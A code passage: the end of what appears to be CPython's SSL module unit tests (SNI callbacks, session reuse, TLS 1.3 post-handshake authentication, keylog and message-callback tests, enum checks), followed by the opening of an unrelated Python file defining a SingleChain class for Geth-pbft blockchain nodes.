chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
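    # test_npn_protocols: NPN has been superseded by ALPN and its support was
    # removed, so the module is expected to report HAS_NPN as False.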
def test_npn_protocols(self):
assert not ssl.HAS_NPN
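    # sni_contexts() is a helper for the SNI callback tests below: it returns
    # a default server context, an alternate server context loaded with
    # SIGNED_CERTFILE2, and a client context that trusts the signing CA.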
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # The certificate loaded from SIGNED_CERTFILE2 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
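    # test_sendfile: SSLSocket.sendfile() has to copy the data through send()
    # rather than the zero-copy os.sendfile() path on an encrypted connection;
    # the test only checks the file contents round-trip through the echo server.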
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
                # the session can be set before the handshake, i.e. before
                # the connection is established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
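# The post-handshake authentication (PHA) tests below drive the TLS 1.3
# feature through the ThreadedEchoServer, whose connection handler responds
# to the HASCERT/PHA/GETCERT/VERIFIEDCHAIN commands the clients send.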
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
                # The test sometimes fails with an EOF error; it passes as
                # long as the server aborts the connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
        # no cert validation and no CA loaded on the client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
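    # test_keylog_env: only ssl.create_default_context() and
    # ssl._create_stdlib_context() honour the SSLKEYLOGFILE environment
    # variable; a bare SSLContext does not. As a usage sketch (not part of the
    # test, file name is illustrative): running `SSLKEYLOGFILE=keys.log
    # python app.py` makes those contexts append NSS-format key log lines
    # that tools such as Wireshark can consume.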
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
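    # The tests below exercise the private _msg_callback debugging hook: the
    # setter rejects non-callables, a TLS 1.2 handshake lets the callback
    # observe individual records such as SERVER_KEY_EXCHANGE and
    # CHANGE_CIPHER_SPEC, and the bpo-43577 test checks it does not deadlock
    # when combined with an SNI callback.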
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
            See RFC 8446, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
# This member is assigned dynamically in `ssl.py`:
Checked_SSLMethod.PROTOCOL_SSLv23 = Checked_SSLMethod.PROTOCOL_TLS
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.IntFlag, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLErrorNumber = enum._old_convert_(
enum.IntEnum, 'SSLErrorNumber', 'ssl',
lambda name: name.startswith('SSL_ERROR_'),
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLErrorNumber, ssl.SSLErrorNumber)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.IntFlag, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def setUpModule():
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
thread_info = threading_helper.threading_setup()
unittest.addModuleCleanup(threading_helper.threading_cleanup, *thread_info)
if __name__ == "__main__":
unittest.main()
|
singlechain.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import threading
import json
from collections import defaultdict
from chain.const import IP_CONFIG, USERNAME, PASSWD
from chain.gethnode import GethNode
from chain.iplist import IPList
from chain.conf import generate_genesis, generate_leaf_genesis
class SingleChain(object):
"""
Data structure for a set of Geth-pbft clients for a single blockchain.
"""
def __init__(self, name: str, level: int, node_count: int, threshold: int,
blockchain_id: int, ip_list: IPList, username: str = USERNAME, password: str = PASSWD) -> None:
# Check if the input params are legal.
if node_count > ip_list.get_full_count():
raise ValueError("not enough IPs")
self.username = username
self.password = password
self.level = level
self.chain_id = name # chain id
self.node_count = node_count
self.threshold = threshold
self.blockchain_id = blockchain_id
self.ip_list = ip_list
self.nodes = []
self.ips = set()
self.if_set_number = False
self.if_set_level = False
self.if_set_id = False
self.is_terminal = False
self.config_file = None
self.accounts = []
self.map = defaultdict(dict) # map of {tag: {enode: node}}
def singlechain_start(self) -> None:
"""Start all containers for a single chain."""
threads = []
for index in range(self.node_count):
pbft_id = index
node_index = index + 1
tmp = GethNode(self.ip_list, pbft_id, node_index, self.blockchain_id, self.username)
self.ips.add(tmp.ip)
self.nodes.append(tmp)
            # xq: start a thread; target is the function to run and args are its parameters
